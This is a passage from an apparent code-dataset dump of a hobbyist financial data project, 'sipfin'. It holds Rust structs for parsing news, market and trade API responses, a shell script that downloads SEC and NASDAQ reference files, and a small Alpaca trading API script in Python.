&& git commit -m \" \" && git push\n```\n\n\n# Videos\n## Neural nets\n[3blue1brown intro](https://www.youtube.com/watch?v=aircAruvnKk)\n\n" }, { "alpha_fraction": 0.609968364238739, "alphanum_fraction": 0.6147152185440063, "avg_line_length": 25.33333396911621, "blob_id": "00cda1914720e3e5ba6a8d2b24e426c520a27f02", "content_id": "80e4199571a1dfd339bf89c75b7528cb57dfb6e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1264, "license_type": "no_license", "max_line_length": 95, "num_lines": 48, "path": "/finox/src/news/moodys.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "// https://www.moodys.com/_layouts/mdc/am/Request/request.php?profile=homepage\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub status: i64,\n pub message: String,\n pub polltime: i64,\n pub timestamp: String,\n pub count: i64,\n pub headlines: Vec<Headline>,\n}\n\nimpl crate::HasRecs for Root {\n fn to_recs(&self) -> Vec<Vec<String>> {\n self.headlines.iter().map(|x| x.to_rec()).collect()\n }\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Headline {\n pub backfill: bool,\n pub is_web_feed: bool,\n pub title: String,\n #[serde(rename = \"read_key\")]\n pub read_key: String,\n pub source: String,\n #[serde(rename = \"receive_date\")]\n pub receive_date: String,\n pub synopsis: String,\n pub url: String,\n pub symbols: Vec<String>,\n pub codes: Vec<String>,\n \n}\n\nimpl Headline {\n pub fn to_rec(&self) -> Vec<String> {\n vec![\n self.title.to_string(),\n self.source.to_string(),\n self.receive_date.to_string(),\n self.synopsis.to_string(),\n ]\n }\n}\n" }, { "alpha_fraction": 0.6086956262588501, "alphanum_fraction": 0.6384439468383789, "avg_line_length": 17.95652198791504, "blob_id": "5c94ea1d06d2fa79e0d6c9780e23710706c1edba", "content_id": "019174ba081a6dd3a5322b38f8e57b713de1c570", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 437, "license_type": "no_license", "max_line_length": 93, "num_lines": 23, "path": "/utils.sh", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\noptions() {\n curl \"ftp://ftp.nasdaqtrader.com/symboldirectory/options.txt\" -o \"./ref_data/options.txt\"\n}\n\nfor YEAR in {1993..2020}\ndo \n\tfor QTR in {1..4}\n\tdo \n\t\tURL=\"https://www.sec.gov/Archives/edgar/full-index/$YEAR/QTR$QTR/master.idx\" \n\t\tOPATH=\"./ref_data/sec/master_$YEAR$QTR.idx\"\n\t\techo \"$URL, to $OPATH\"\n\t\tcurl $URL -o $OPATH\n\tdone\ndone\n\n\nfor f in ./ref_data/sec/*.idx\ndo \n\tsed -i -e 1,9d $f\n\tsed -i -e 2d $f\ndone\n\n" }, { "alpha_fraction": 0.5916954874992371, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 23.08333396911621, "blob_id": "a3a9e82b4bf82ec2949aa16fce6784693acbc471", "content_id": "cf2b8484a17f4b208baf0619286444a7c1444679", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "TOML", "length_bytes": 289, "license_type": "no_license", "max_line_length": 96, "num_lines": 12, "path": "/listen/Cargo.toml", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "[package]\nname = \"listen\"\nversion = \"0.1.0\"\nauthors = [\"anandijain <[email protected]>\"]\nedition = \"2018\"\n\n# See more keys and their definitions at 
https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nhound = \"3.4.0\"\ncsv = \"1.1.3\"\nfinox = { version = \"0.1.0\", path = \"../finox\" }\n" }, { "alpha_fraction": 0.5608623623847961, "alphanum_fraction": 0.5747926831245422, "avg_line_length": 28.568628311157227, "blob_id": "9b64158289c18929c5a36685960cac9fe114fbf8", "content_id": "900daba852b5907b4bbdcef3386ff9e3885def78", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3015, "license_type": "no_license", "max_line_length": 95, "num_lines": 102, "path": "/finox/src/misc/xue.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\n\n// use crate::utils;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n pub data: Vec<Daum>,\n #[serde(rename = \"error_code\")]\n pub error_code: i64,\n #[serde(rename = \"error_description\")]\n pub error_description: ::serde_json::Value,\n}\n\nimpl Root {\n pub fn to_records(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for t in self.data.iter() {\n // println!(\"{:#?}\", t);\n recs.push(Daum::to_record(t));\n }\n return recs;\n }\n}\n\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Daum {\n pub symbol: String,\n pub current: f64,\n pub percent: f64,\n pub chg: f64,\n pub timestamp: i64,\n pub volume: i64,\n pub amount: f64,\n #[serde(rename = \"market_capital\")]\n pub market_capital: f64,\n #[serde(rename = \"float_market_capital\")]\n pub float_market_capital: ::serde_json::Value,\n #[serde(rename = \"turnover_rate\")]\n pub turnover_rate: f64,\n pub amplitude: f64,\n pub open: f64,\n #[serde(rename = \"last_close\")]\n pub last_close: f64,\n pub high: f64,\n pub low: f64,\n #[serde(rename = \"avg_price\")]\n pub avg_price: f64,\n #[serde(rename = \"trade_volume\")]\n pub trade_volume: i64,\n pub side: i64,\n #[serde(rename = \"is_trade\")]\n pub is_trade: bool,\n pub level: i64,\n #[serde(rename = \"trade_session\")]\n pub trade_session: i64,\n #[serde(rename = \"trade_type\")]\n pub trade_type: ::serde_json::Value,\n #[serde(rename = \"current_year_percent\")]\n pub current_year_percent: f64,\n #[serde(rename = \"trade_unique_id\")]\n pub trade_unique_id: String,\n #[serde(rename = \"type\")]\n pub type_field: i64,\n #[serde(rename = \"bid_appl_seq_num\")]\n pub bid_appl_seq_num: ::serde_json::Value,\n #[serde(rename = \"offer_appl_seq_num\")]\n pub offer_appl_seq_num: ::serde_json::Value,\n}\n\n\nimpl Daum {\n pub fn to_record(&self) -> Vec<String> {\n let rec: Vec<String> = vec!(\n self.symbol.to_string(),\n self.timestamp.to_string(),\n self.current.to_string(),\n self.trade_volume.to_string(),\n self.volume.to_string(),\n self.open.to_string(),\n self.high.to_string(),\n self.low.to_string(),\n self.last_close.to_string(),\n self.avg_price.to_string(),\n self.amount.to_string(),\n self.percent.to_string(),\n self.chg.to_string(),\n self.market_capital.to_string(),\n self.turnover_rate.to_string(),\n self.amplitude.to_string(),\n self.current_year_percent.to_string(),\n self.level.to_string(),\n self.trade_session.to_string(),\n );\n\n return rec;\n }\n}" }, { "alpha_fraction": 0.6146179437637329, "alphanum_fraction": 0.619601309299469, "avg_line_length": 21.296297073364258, "blob_id": 
"da2a4855fc95dc8a4871f15a962f38b7c3ed60df", "content_id": "d82f6072695d0c248dc6cdda80567a642bddeddf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 602, "license_type": "no_license", "max_line_length": 74, "num_lines": 27, "path": "/py/alp.py", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "import requests as r\nimport json\nfrom config import *\nimport alpaca_trade_api as tradeapi\n\n\napi = tradeapi.REST()\ndef test_get():\n barset = api.get_barset('AAPL', 'day', limit=5)\n aapl_bars = barset['AAPL']\n return aapl_bars\n\nACC_URL = f'{BASE_URL}/v2/account'\nORD_URL = f'{BASE_URL}/v2/orders'\n\nHEADERS = {'APCA-API-KEY-ID' : API_KEY, 'APCA-API-SECRET-KEY': SECRET_KEY}\n\ndef get_acc():\n req = r.get(ACC_URL, headers=HEADERS)\n return json.loads(req.content)\n\n\nif __name__ == \"__main__\":\n # /ret = get_acc()\n # print(f'ret: {ret}')\n aapl = test_get() \n print(f'aapl: {aapl}')\n" }, { "alpha_fraction": 0.6090164184570312, "alphanum_fraction": 0.6136270761489868, "avg_line_length": 28.847095489501953, "blob_id": "163e2aa9aa0d1b0fbe09a7fdd5b93e0c49c70824", "content_id": "2dc026c7f1182aed074e288bc1a4bb52999273e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 9763, "license_type": "no_license", "max_line_length": 97, "num_lines": 327, "path": "/finox/src/news/nyt.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "pub fn nyt_archive_urls() -> Vec<String> {\n let mut urls = vec![];\n for i in 1853..2019 {\n for j in 1..=12 {\n let url = format!(\n \"https://api.nytimes.com/svc/archive/v1/{}/{}.json?api-key={}\",\n i,\n j,\n crate::keys::NYT_KEY.to_string()\n );\n urls.push(url);\n }\n }\n urls\n}\n\n// https://api.nytimes.com/svc/news/v3/content/all/all.json\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NYTFeed {\n pub status: String,\n pub copyright: Option<String>,\n #[serde(rename = \"num_results\")]\n pub num_results: i64,\n pub results: Vec<NYTFeedArticle>,\n}\n\nimpl crate::HasRecs for NYTFeed {\n fn to_recs(&self) -> Vec<Vec<String>> {\n let mut recs: Vec<Vec<String>> = Vec::new();\n for article in self.results.iter() {\n recs.push(NYTFeedArticle::to_rec(article));\n }\n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NYTFeedArticle {\n #[serde(rename = \"slug_name\")]\n pub slug_name: String,\n pub section: String,\n pub subsection: String,\n pub title: String,\n #[serde(rename = \"abstract\")]\n pub abstract_field: String,\n pub url: String,\n pub byline: String,\n #[serde(rename = \"item_type\")]\n pub item_type: String,\n pub source: String,\n #[serde(rename = \"updated_date\")]\n pub updated_date: String,\n #[serde(rename = \"created_date\")]\n pub created_date: String,\n #[serde(rename = \"published_date\")]\n pub published_date: String,\n #[serde(rename = \"first_published_date\")]\n pub first_published_date: String,\n #[serde(rename = \"material_type_facet\")]\n pub material_type_facet: String,\n pub kicker: String,\n pub subheadline: String,\n #[serde(rename = \"des_facet\")]\n #[serde(default)]\n pub des_facet: Option<Vec<String>>,\n #[serde(rename = \"org_facet\")]\n #[serde(default)]\n pub org_facet: Option<Vec<String>>,\n #[serde(rename = \"per_facet\")]\n #[serde(default)]\n pub 
per_facet: Option<Vec<String>>,\n #[serde(rename = \"geo_facet\")]\n #[serde(default)]\n pub geo_facet: Option<Vec<String>>,\n #[serde(rename = \"related_urls\")]\n pub related_urls: ::serde_json::Value,\n pub multimedia: Option<Vec<NYTFeedMultimedia>>,\n #[serde(rename = \"thumbnail_standard\")]\n pub thumbnail_standard: Option<String>,\n}\n\nimpl NYTFeedArticle {\n pub fn to_rec(&self) -> Vec<String> {\n //limiting 1 for tags\n //let thumbnail_url = utils::lilmatcher(self.thumbnail_standard.clone());\n\n let rec: Vec<String> = vec![\n self.slug_name.to_string(),\n self.first_published_date.to_string(),\n self.section.to_string(),\n self.subsection.to_string(),\n self.byline.to_string(),\n self.title.to_string(),\n self.subheadline.to_string(),\n self.abstract_field.to_string(),\n self.material_type_facet.to_string(),\n //self.geo_facet.unwrap_or(\"\"),\n //self.org_facet[0].unwrap_or(\"\"),\n //self.des_facet[0].unwrap_or(\"\"),\n //self.per_facet[0].unwrap_or(\"\"),\n self.source.to_string(),\n self.published_date.to_string(),\n self.created_date.to_string(),\n self.updated_date.to_string(),\n self.url.to_string(),\n //self.thumbnail_standard.unwrap_or(\"\").to_string(),\n self.kicker.to_string(),\n self.item_type.to_string(),\n ];\n return rec;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NYTFeedMultimedia {\n pub url: Option<String>,\n pub format: Option<String>,\n pub height: Option<i64>,\n pub width: Option<i64>,\n #[serde(rename = \"type\")]\n pub type_field: Option<String>,\n pub subtype: Option<String>,\n pub caption: Option<String>,\n pub copyright: Option<String>,\n}\n\n// https://api.nytimes.com/svc/archive/v1/1926/1.json\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct NYTArchive {\n// pub copyright: Option<String>,\n// pub response: NYTArchiveResponse,\n//}\n//\n//impl NYTArchive {\n// pub fn to_recs(&self) -> Vec<Vec<String>> {\n// let mut recs: Vec<Vec<String>> = Vec::new();\n// for article in self.response.docs.iter() {\n// recs.push(NYTArchiveArticle::to_rec(article));\n// }\n// return recs;\n// }\n//}\n//\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct NYTArchiveResponse {\n// pub meta: NYTArchiveMeta,\n// pub docs: Vec<NYTArchiveArticle>,\n//}\n//\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct NYTArchiveMeta {\n// pub hits: i64,\n//}\n//\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct NYTArchiveArticle {\n// #[serde(rename = \"web_url\")]\n// pub web_url: String,\n// pub snippet: Option<String>,\n// #[serde(rename = \"lead_paragraph\")]\n// pub lead_paragraph: Option<String>,\n// #[serde(rename = \"abstract\")]\n// pub abstract_field: Option<String>,\n// #[serde(rename = \"print_page\")]\n// pub print_page: Option<String>,\n// pub blog: Option<Vec<::serde_json::Value>>,\n// pub source: String,\n// pub multimedia: Vec<::serde_json::Value>,\n// pub headline: NYTArchiveHeadline,\n// pub keywords: Vec<Keyword>,\n// #[serde(rename = \"pub_date\")]\n// pub pub_date: String,\n// #[serde(rename = \"document_type\")]\n// pub document_type: String,\n// 
#[serde(rename = \"news_desk\")]\n// pub news_desk: Option<serde_json::Value>,\n// #[serde(rename = \"section_name\")]\n// pub section_name: Option<serde_json::Value>,\n// #[serde(rename = \"subsection_name\")]\n// pub subsection_name: Option<serde_json::Value>,\n// pub byline: Option<Byline>,\n// #[serde(rename = \"type_of_material\")]\n// pub type_of_material: Option<String>,\n// #[serde(rename = \"_id\")]\n// pub id: String,\n// #[serde(rename = \"word_count\")]\n// pub word_count: i64,\n// #[serde(rename = \"slideshow_credits\")]\n// pub slideshow_credits: Option<serde_json::Value>,\n//}\n//\n//impl NYTArchiveArticle {\n// pub fn to_rec(&self) -> Vec<String> {\n// // let first_name = lilmatcher(self.byline.person.firstname);\n// // let first_name = lilmatcher(self.byline.person.middlename);\n// // let first_name = lilmatcher(self.byline.person.lastname);\n//\n// let rec: Vec<String> = vec![\n// self.id.to_string(),\n// self.word_count.to_string(),\n// orig.replace(\",\", \";\").to_string(),\n// self.pub_date.to_string(),\n// self.document_type.to_string(),\n// page.to_string(),\n// self.headline.main.replace(\",\", \";\").to_string(),\n// kicker.replace(\",\", \";\").to_string(),\n// snip.replace(\",\", \";\").to_string(),\n// abs_field.replace(\",\", \";\").to_string(),\n// self.web_url.to_string(),\n// self.source.to_string(),\n// ];\n// return rec;\n// }\n//}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct NYTArchiveHeadline {\n pub main: String,\n pub kicker: Option<String>,\n #[serde(rename = \"content_kicker\")]\n pub content_kicker: Option<String>,\n #[serde(rename = \"print_headline\")]\n pub print_headline: Option<String>,\n pub name: Option<serde_json::Value>,\n pub seo: Option<serde_json::Value>,\n pub sub: Option<serde_json::Value>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Keyword {\n pub name: Option<String>,\n pub value: Option<String>,\n pub rank: Option<i64>,\n pub major: Option<String>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Byline {\n pub original: Option<String>,\n #[serde(default)]\n pub person: Option<Vec<Person>>,\n pub organization: Option<String>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Person {\n pub firstname: Option<String>,\n pub middlename: Option<String>,\n pub lastname: Option<String>,\n pub qualifier: Option<String>,\n pub title: Option<serde_json::Value>,\n pub role: String,\n pub organization: String,\n pub rank: i64,\n}\n\n//pub fn byline_orig(byline: Option<Byline>) -> String {\n// if let Some(byline) = byline {\n// return utils::lilmatcher(byline.original);\n// }\n// return \"\".to_string();\n//}\n\n/*\nadmin\narts\nautomobiles\nbooks\nbriefing\nbusiness\nclimate\ncorrections\ncrosswords \\u0026 games\neducation\nen español\nfashion\nfood\nguides\nhealth\nhome \\u0026 garden\nhome page\njob market\nlens\nmagazine\nmovies\nmultimedia/photos\nnew york\nobituaries\nopinion\nparenting\npodcasts\nreader center\nreal estate\nscience\nsmarter living\nsports\nstyle\nsunday review\nt brand\nt magazine\ntechnology\nthe learning network\nthe upshot\nthe weekly\ntheater\ntimes insider\ntoday’s 
paper\ntravel\nu.s.\nuniversal\nvideo\nwell\nworld\nyour money\n\n*/\n" }, { "alpha_fraction": 0.6275604963302612, "alphanum_fraction": 0.6288020014762878, "avg_line_length": 26.775861740112305, "blob_id": "cb74939f4984c0a7548d23d927d79f37c0a34233", "content_id": "6814756c72469f25cb4d8b318add5aaa93ddd3b7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1611, "license_type": "no_license", "max_line_length": 95, "num_lines": 58, "path": "/finox/src/misc/uncomtrade.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nextern crate csv;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct ResMeta {\n pub more: bool,\n pub minimum_input_length: i64,\n pub class_code: String,\n pub class_name: String,\n pub results: Vec<MetaResult>,\n}\n\nimpl ResMeta {\n pub fn to_records(&self) -> Vec<csv::StringRecord> {\n let mut recs: Vec<csv::StringRecord> = Vec::new();\n for elt in self.results.iter(){\n recs.push(MetaResult::to_record(elt));\n }\n return recs;\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct MetaResult {\n pub id: String,\n pub text: String,\n pub parent: String,\n}\n\nimpl MetaResult {\n pub fn to_record(&self) -> csv::StringRecord {\n let text = self.text.replace(\",\", \";\");\n let rec = &[\n self.id.to_string(),\n text.to_string(),\n self.parent.to_string(),\n ];\n return csv::StringRecord::from(rec.to_vec());\n }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Areas {\n pub more: bool,\n pub results: Vec<AreaResult>,\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct AreaResult {\n pub id: String,\n pub text: String,\n}\n" }, { "alpha_fraction": 0.5634357929229736, "alphanum_fraction": 0.5823482871055603, "avg_line_length": 27.200000762939453, "blob_id": "798edc4e3761d242aeb3fe445e0a02361bbd964c", "content_id": "62b02842b27c05e9a45f3d7eb09428538bd7dc94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1269, "license_type": "no_license", "max_line_length": 95, "num_lines": 45, "path": "/listen/src/main.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "use csv;\nuse finox::roses;\nuse hound;\nuse std::error::Error;\nuse std::f32::consts::PI;\nuse std::i16;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Row {\n pub symbol: String,\n pub t: String,\n pub x: f64,\n pub v: u64,\n}\n\nfn main() -> Result<(), hound::Error> {\n //let strs = roses::read_tickers(\"../ref_data/tickers_stocks.txt\");\n //for s in strs.iter() {\n do_one(\"SPY\").unwrap();\n //}\n Ok(())\n}\n\nfn do_one(s: &str) -> Result<(), Box<dyn Error>> {\n let spec = hound::WavSpec {\n channels: 1,\n sample_rate: 44100,\n bits_per_sample: 16,\n sample_format: hound::SampleFormat::Int,\n };\n let file_name = format!(\"../data/nasdaq/realtime-trades/{}.csv\", s);\n let output_name = format!(\"../data/sound/{}.wav\", s);\n //let mut rdr = csv::Reader::from_path().unwrap();\n //let mut iter = 
rdr.deserialize();\n    let rows = roses::read_into::<Row>(file_name);\n\n    let mut wtr = hound::WavWriter::create(output_name, spec).unwrap();\n    for r in rows {\n        let sample = r.x * r.v as f64;\n        // keep the scale factor in f64 so the product with `sample` type-checks before the single cast to i16\n        let amplitude = i16::MAX as f64;\n        wtr.write_sample((sample * amplitude) as i16).unwrap();\n    }\n    Ok(())\n}\n" }, { "alpha_fraction": 0.5664610266685486, "alphanum_fraction": 0.5698261260986328, "avg_line_length": 25.22058868408203, "blob_id": "62b86d903fcb88ca627bd5c8446c5bb3d9b385e2", "content_id": "a5976d0f54173883b4382a30433a88e2f7f42d73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1783, "license_type": "no_license", "max_line_length": 95, "num_lines": 68, "path": "/finox/src/misc/weather.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate csv;\nextern crate serde;\nextern crate serde_derive;\nextern crate serde_json;\nuse std::fs;\nuse crate::utils;\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Root {\n    pub id: i64,\n    pub name: String,\n    pub state: String,\n    pub country: String,\n    pub coord: Coord,\n}\nimpl Root {\n    pub fn to_record(&self) -> Vec<String> {\n        let mut rec: Vec<String> = vec!(\n            self.id.to_string(),\n            self.name.to_string(),\n            self.state.to_string(),\n            self.country.to_string(),\n        );\n        rec.append(&mut Coord::to_record(&self.coord));\n\n        return rec;\n    }\n}\n\n#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n#[serde(rename_all = \"camelCase\")]\npub struct Coord {\n    pub lon: f64,\n    pub lat: f64,\n}\n\nimpl Coord {\n    pub fn to_record(&self) -> Vec<String> {\n        return vec![self.lat.to_string(), self.lon.to_string()];\n    }\n}\n\n\npub fn cities_to_csv() -> Result<(), csv::Error> {\n    let mut wtr = csv::Writer::from_path(\"city_list.csv\".to_string())?;\n    let jsonstr = fs::read_to_string(\"city_list.json\")\n        .expect(\"Something went wrong reading the file\");\n    let roots: Vec<Root> = serde_json::from_str(&jsonstr.to_string()).unwrap();\n    let recs: Vec<csv::StringRecord> = roots\n        .into_iter()\n        .map(|x| csv::StringRecord::from(Root::to_record(&x)))\n        .collect();\n    wtr.write_record(vec!(\n        \"id\",\n        \"name\",\n        \"state\",\n        \"country\",\n        \"lat\",\n        \"lon\",\n    ))?;\n    for r in recs.iter() {\n        wtr.write_record(r)?;\n    }\n    wtr.flush()?;\n    println!(\"With text:\\n{:#?}\", recs);\n    Ok(())\n}\n" }, { "alpha_fraction": 0.595245361328125, "alphanum_fraction": 0.5958549380302429, "avg_line_length": 33.16666793823242, "blob_id": "a477e183116e1dd957def04a2f7e623f512c5d40", "content_id": "057c423e50c337743b5e96d297499098224cd133", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3281, "license_type": "no_license", "max_line_length": 98, "num_lines": 96, "path": "/finox/src/misc/misc.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "\n// #[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n// #[serde(rename_all = \"camelCase\")]\n// pub struct Collections {\n//     pub field_data_collection: Vec<FieldDataCollection>,\n// }\n\n// #[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n// #[serde(rename_all = \"camelCase\")]\n// pub struct FieldDataCollection {\n//     pub id: String,\n//     pub issued_currency: String,\n//     pub long_name: String,\n//     pub price: String,\n//     pub price_change1_day: String,\n//     pub 
percent_change1_day: String,\n// #[serde(rename = \"tradingDayCloseUTC\")]\n// pub trading_day_close_utc: String,\n// #[serde(rename = \"lastUpdateUTC\")]\n// pub last_update_utc: String,\n// #[serde(rename = \"MEDIA_SECURITY_TYPE\")]\n// pub media_security_type: String,\n// #[serde(rename = \"MEDIA_SECURITY_SUBTYPE\")]\n// pub media_security_subtype: String,\n// pub security_type: String,\n// pub short_name: String,\n// pub commodity_contract_date: String,\n// pub price_date: String,\n// pub last_update_time: String,\n// #[serde(rename = \"lastUpdateISO\")]\n// pub last_update_iso: String,\n// pub user_time_zone: String,\n// pub market_open: bool,\n// pub commodity_units: Option<String>,\n// }\n\n// pub fn hs_and_st() -> Result<(), reqwest::Error> {\n// let url = \"https://comtrade.un.org/Data/cache/classificationST.json\";\n// let write_fn = \"st.csv\";\n// // \"https://comtrade.un.org/Data/cache/classificationST.json\"];\n// // for url in urls.iter() {\n// if let Ok(body) = getters::simple_get(url.to_string()) {\n// let res: uncomtrade::ResMeta = serde_json::from_str(&body.to_string()).unwrap();\n// let recs = uncomtrade::ResMeta::to_records(&res);\n// writerecs(write_fn.to_string(), &[\"id\", \"text\", \"parent\"], recs);\n// }\n// Ok(())\n// }\n\n\n\n\n\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct NewsVec {\n// pub news: Vec<News>,\n//}\n//\n//impl NewsVec {\n// pub fn to_records(&self) -> Result<Vec<csv::StringRecord>, csv::Error> {\n// let mut ret: Vec<csv::StringRecord> = Vec::new();\n// for article in self.news.iter() {\n// ret.push(News::to_record(article));\n// }\n// Ok(ret)\n// }\n//}\n//\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct News {\n// pub headline: String,\n// pub published_at: String,\n// pub url: String,\n// #[serde(rename = \"publishedAtISO\")]\n// pub published_at_iso: String,\n//}\n//\n//impl News {\n// pub fn to_record(&self) -> csv::StringRecord {\n// let hl_text = self.headline.replace(\",\", \";\");\n// let rec = &[\n// self.url.to_string(),\n// hl_text.to_string(),\n// self.published_at.to_string(),\n// ];\n// return csv::StringRecord::from(rec.to_vec());\n// }\n//}\n//\n//#[derive(Default, Debug, Clone, PartialEq, serde_derive::Serialize, serde_derive::Deserialize)]\n//#[serde(rename_all = \"camelCase\")]\n//pub struct Channel {\n// pub path: String,\n// pub name: String,\n//}\n" }, { "alpha_fraction": 0.5343283414840698, "alphanum_fraction": 0.5641791224479675, "avg_line_length": 32.5, "blob_id": "b32df3629779ab542393d2ddfa8be51952a57ee4", "content_id": "f55ac4eea6669341935bc7416a6c6417e8dd0ef6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 1675, "license_type": "no_license", "max_line_length": 118, "num_lines": 50, "path": "/finox/src/bin/yf.rs", "repo_name": "adamkeller2000/sipfin", "src_encoding": "UTF-8", "text": "extern crate chrono;\nextern crate reqwest;\nextern crate tokio;\n\nuse std::{collections::HashMap, env};\n\n//let symbs: Vec<&str> = finox::headers::CURRENCY_SYMBOLS_YF.to_vec(); //.into_iter().cloned().collect();\n//let t = epoch_str();\n//let urls = gen_yfx_urls(symbs);\n//https://query1.finance.yahoo.com/v8/finance/chart/GOOG?lang=en-US&region=US&interval=1d&period1=0&period2=1590451200\n\n#[tokio::main]\nasync fn main() -> Result<(), Box<dyn std::error::Error>> {\n /* 
args:\n * 1: one in ['stocks', 'commodities', 'currencies']\n */\n\n let args = env::args().collect::<Vec<String>>();\n let (tickers, headers) = finox::gen_secs(&args[1]);\n let mut hm: HashMap<String, String> = HashMap::new();\n for symb in tickers.iter() {\n hm.insert(symb.to_string(), symb.to_yf());\n }\n if let Ok(recs) = finox::fetch_write::<finox::yf::YFRoot>(hm, \"../data/yf/\", headers).await {\n println!(\"{:#?}\", recs);\n }\n Ok(())\n}\n\n// TODO look into the correct pattern for interlacing like this\npub fn gen_yfx_urls(symbs: Vec<&str>) -> Vec<String> {\n let len = symbs.len();\n let mut urls: Vec<String> = vec![];\n for (i, x) in symbs.iter().enumerate() {\n for y in symbs[i..len].iter() {\n if x == y {\n continue;\n };\n urls.push(\n format!(\n //\"https://query2.finance.yahoo.com/v8/finance/chart/{}=F?interval=1d&period1=0&period2=1589932800\",\n \"https://query1.finance.yahoo.com/v8/finance/chart/{}{}=X?interval=1d&period1=0&period2=1589932800\",\n x.to_string(),\n y.to_string()\n )\n );\n }\n }\n urls\n}\n" }, { "alpha_fraction": 0.5717771053314209, "alphanum_fraction": 0.5811015963554382, "avg_line_length": 38.33049011230469, "blob_id": "03a74470fbaf21ca6958cfd9f89909f830a6f2af", "content_id": 